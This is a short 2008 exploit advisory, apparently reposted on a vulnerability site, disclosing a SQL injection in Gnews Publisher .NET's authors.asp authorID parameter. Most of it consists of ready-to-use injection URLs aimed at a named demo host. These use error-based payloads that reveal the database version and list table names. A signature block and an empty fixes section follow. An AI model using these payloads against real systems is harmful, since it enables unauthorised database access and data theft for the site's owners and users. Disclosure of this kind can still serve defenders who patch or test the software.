Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability
2008-12-16 02:02:32###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Gnews Publisher
#download : null
#Demo : http://www.gazatem.com/demos/gnews/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=(SQL)
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+@@version));--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--
#Greetz For my Best Friend Zigma
###########################################################################
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

